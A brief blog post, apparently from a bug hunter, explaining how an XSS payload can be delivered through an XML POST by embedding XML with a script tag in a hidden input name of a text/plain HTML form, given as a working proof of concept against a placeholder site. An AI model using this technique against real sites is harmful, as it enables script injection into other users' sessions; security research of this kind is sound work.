XSS via XML POST

I was bug hunting on a site which looked like this: 

POST /snip/snippet.php HTTP/1.1 
<?xml version="1.0"?> 


I tested in BURP for XSS in XML, and it worked. Now I have to get this to work via a browser. I was a bit stuck of sending XML in a HTML form POST and google didn’t yeild me any results, but I worked out how. Below is my PoC: 

<html> <body> <form ENCTYPE="text/plain" action="http://vulnsite.com/snip/snippet.php" method="post"> <input type="hidden" name="<foo> <html xmlns:html='http://www.w3.org/1999/xhtml'> <html:script>alert(1);</html:script> </html> </foo>"> <input type="submit" value="submit"> </form> 

Upon pressing “Submit”, the XSS in the XML is sent, and executes. And there we have it.. XSS in a XML post via a HTML form. Turns out adding the input name as the XSS will allow it to be executed. 

Note: Turns out all endpoints on the target site are vulnerable to this.. they’re going to have fun patching this. ;)
posted @ 2016-09-21 22:44  独裁者  阅读(373)  评论(0编辑  收藏  举报